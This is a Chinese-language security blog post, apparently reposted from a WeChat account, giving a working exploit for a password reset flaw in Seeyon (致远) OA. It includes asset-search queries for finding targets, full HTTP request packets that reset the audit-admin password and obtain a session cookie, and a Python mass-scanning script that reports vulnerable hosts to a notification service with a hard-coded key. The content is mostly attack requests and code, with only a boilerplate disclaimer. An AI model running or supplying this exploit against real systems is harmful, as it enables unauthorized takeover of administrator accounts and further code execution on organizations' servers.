一、漏洞描述
致远OA存在前台密码重置漏洞,可以重置系统中默认账户,使用重置后的密码通过接口获取cookie后可getshell,此组合拳可以实现致远的前台RCE。
二、信息收集
hunter:app.name="致远 OA"fofa:app="致远A8"
收集资产
三、漏洞复现
重置审计管理员密码
seeyon-guest -696400025239268-----忽略 system -72730320132347481---忽略 audit-admin -440160666363------忽略 group-admin 5725175934914479521
第一步,我们需要发送一个PUT请求包,来验证漏洞的存在性
PUT /seeyon/rest/orgMember/-4401606663639775639/password/share.do HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
如果回200OK,和截图的样子,就说明成功了一半
接着,我们继续发POST请求,来验证
POST /seeyon/rest/authentication/ucpcLogin?login_username=audit-admin&login_password=share.do&ticket= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Content-Type: application/x-www-form-urlencoded
这个时候你已经登录OK了,
获取当前用户信息,确认cookie有效性
POST /seeyon/rest/m3/login/getCurrentUser HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Cookie: JSESSIONID=66413CAC627CF5AE8DE839AB47E82B4D; Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Content-Type: application/json;charset=UTF-8 {"":""}
出现这个表示成功
使用重置后的密码登录
audit-admin/share.do
四、重要python代码
#致远OA ucpcLogin存在密码重置漏洞 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.exceptions import Timeout import os import urllib.parse import urllib.request import re def sc_send(text, desp='', key='[SENDKEY]'): postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8') urlserver = f'https://sctapi.ftqq.com/{key}.send' req = urllib.request.Request(urlserver, data=postdata, method='POST') with urllib.request.urlopen(req) as response: result = response.read().decode('utf-8') return result key = "SCT202695TeKe1ATgRMke7f7jyrOOkH9GX" def scan_Zhiyuan_OA_pwd_reset_vul(url, proxies, headers, append_to_output): proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080' } if not url.startswith('http://') and not url.startswith('https://'): url = 'http://' + url headers_put = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'close', 'Cookie': 'JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=' } headers_post = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded' } # 定义请求体数据 data_post = { 'login_username': 'audit-admin', 'login_password': 'share.do', 'ticket': '' } data = '''{"":""}''' append_to_output("===================================================================", "green") append_to_output(f"扫描目标: {url}", "yellow") try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 发送PUT请求 put_response = requests.put(f"{url}/seeyon/rest/orgMember/-4401606663639775639/password/share.do",headers=headers_put,verify=False, timeout=5, proxies=proxies) # 发送POST请求 post_response = requests.post(f"{url}/seeyon/rest/authentication/ucpcLogin", headers=headers_post,data=data_post,verify=False, timeout=5, proxies=proxies) post_response_cookie = requests.post(f"{url}/seeyon/rest/m3/login/getCurrentUser", headers=headers_post,data=data, verify=False, timeout=5, proxies=proxies) # 检查PUT请求响应 if put_response.status_code == 200: append_to_output(f"[+] {url} PUT请求成功并且响应包含!!!!", "yellow") if post_response.status_code == 200 and 'ok' in post_response.text and 'audit-admin' in post_response.text: append_to_output(f"[+] {url} 存在致远OA ucpcLogin存在密码重置漏洞,需要拿COOKIE!!!!", "yellow") if post_response_cookie.status_code == 200 and 'audit-admin' in post_response.text: append_to_output(f"[+] {url} 存在致远OA ucpcLogin存在密码重置漏洞!!!!", "red") ret = sc_send('致远OA ucpcLogin存在密码重置漏洞', f"漏洞连接: {url}rn漏洞类型: 文件上传", key) else: append_to_output(f"[-] {url} 不存在致远OA ucpcLogin存在密码重置漏洞", "green") else: append_to_output(f"[-] {url} 不存在致远OA ucpcLogin存在密码重置漏洞", "green") else: append_to_output(f"[-] {url} 不存在PUT请求成功并且响应包含", "green") except Timeout: append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow") except Exception as e: if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e): append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow") else: append_to_output(str(e), "yellow")
原文始发于微信公众号(暗影网安实验室):致远OA ucpcLogin密码重置(可组合拳GetShell)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论